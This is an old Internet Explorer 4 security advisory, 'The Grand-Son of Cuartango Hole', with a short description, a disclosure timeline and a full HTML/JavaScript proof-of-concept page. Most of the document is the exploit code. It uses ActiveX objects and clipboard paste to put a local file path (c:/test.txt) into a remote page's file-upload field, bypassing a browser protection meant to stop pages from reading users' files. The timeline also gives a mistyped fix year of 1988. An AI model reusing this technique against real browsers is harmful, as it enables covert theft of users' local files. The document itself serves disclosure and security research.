grandson-cuartango-msie.txt

`The Gran-Son of Cuartango Hole  
  
Description  
  
Last variant of Cuartango Hole  
The second Microsoft's fix about the USP issue  
was also wrong. MS has fixed the problem only 24  
hours after the problem was reported.  
  
  
Affected Software  
  
Internet Explorer 4  
  
  
Status  
  
Reported to MS Dec 22 1998  
Confirmed and fixed Dec 23 1988.  
http://www.microsoft.com/windows/ie/security/spoof.asp  
  
  
Exploit  
  
http://pages.whowhere.com/computers/cuartangojc/gson2.html  
  
<html>  
  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<meta name="keywords"  
content="Cuartango, Grand son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer">  
<title>The Grand-Son of Cuartango Hole demo</title>  
</head>  
  
<body>  
  
<h1 align="center"><small><font color="#FF0000">T<strong>he Grand-Son of Cuartango Hole  
demo</strong></font></small></h1>  
  
<p align="center"><strong><small><font face="Arial">The box below (yellow) is a Microsoft  
Web Browser ActiveX object</font></small></strong>   
<object classid="clsid:8856F961-340A-11D0-A96B-00C04FD705A2" width="600" height="140"  
id="nv">  
<param name="ExtentX" value="7938">  
<param name="ExtentY" value="3986">  
<param name="ViewMode" value="1">  
<param name="Offline" value="0">  
<param name="Silent" value="0">  
<param name="RegisterAsBrowser" value="0">  
<param name="RegisterAsDropTarget" value="0">  
<param name="AutoArrange" value="1">  
<param name="NoClientEdge" value="0">  
<param name="AlignLeft" value="0">  
<param name="ViewID" value="{0057D0E0-3573-11CF-AE69-08002B2E1262}">  
</object>  
</p>  
  
<p align="center">&nbsp;<strong> <small><font face="Arial">The box below (blue) is a  
Microsoft Forms 2.0 TextBox ActiveX object</font></small></strong><br>  
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3" width="169"  
height="23">  
<param name="VariousPropertyBits" value="746604571">  
<param name="BackColor" value="16776960">  
<param name="Size" value="4480;600">  
<param name="Value" value="c:/test.txt">  
<param name="FontHeight" value="200">  
<param name="FontCharSet" value="0">  
<param name="FontPitchAndFamily" value="2">  
</object>  
</p>  
  
<p align="center"><small><font face="Arial">The scripts behind this pages will copy the  
TextBox contents to the file box.</font></small></p>  
  
<p align="center"><a href="index.html"><font size="4"><strong>Back to Main Page (More  
BUGS)</strong></font></a></p>  
<script>  
// first we load the page in the Web Browser Object and wait  
nv.navigate("http://pages.whowhere.com/computers/cuartangojc/gson3.html");   
var count = 0;  
function StartJob()  
{ // this funtion is called from the page "gson3.html"  
setTimeout("show()",1000); // first attempt will fail !!!  
setTimeout("show()",2000); // second will work  
}  
function show()  
{  
tb.SelStart = 0;  
tb.SelLength = tb.text.length; // select text in text box  
tb.copy(); // copy it to clipboard  
nv.Document.forms(0).filename.focus();  
nv.Document.execCommand("paste"); // paste over file box  
if (count == 1)  
if(nv.Document.forms[0].filename.value == "")  
alert("Your browser does not have the security hole");  
else  
alert("Security hole in browser -- " + navigator.userAgent );  
count = 1;  
}  
</script>  
  
  
<p align="center"><font color="#FF0000">Created by</font> <a  
href="mailto:[email protected]">Juan Carlos Garcia Cuartango</a> </p>  
  
<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>  
</small><font size="1">Visitors since Dec 21 Año del Señor de 1998</font></font></p>  
  
<p><small>Last update Dec 21 Año del señor de 1998</small></p>  
  
<p>&nbsp;</p>  
</body>  
</html>  
  
`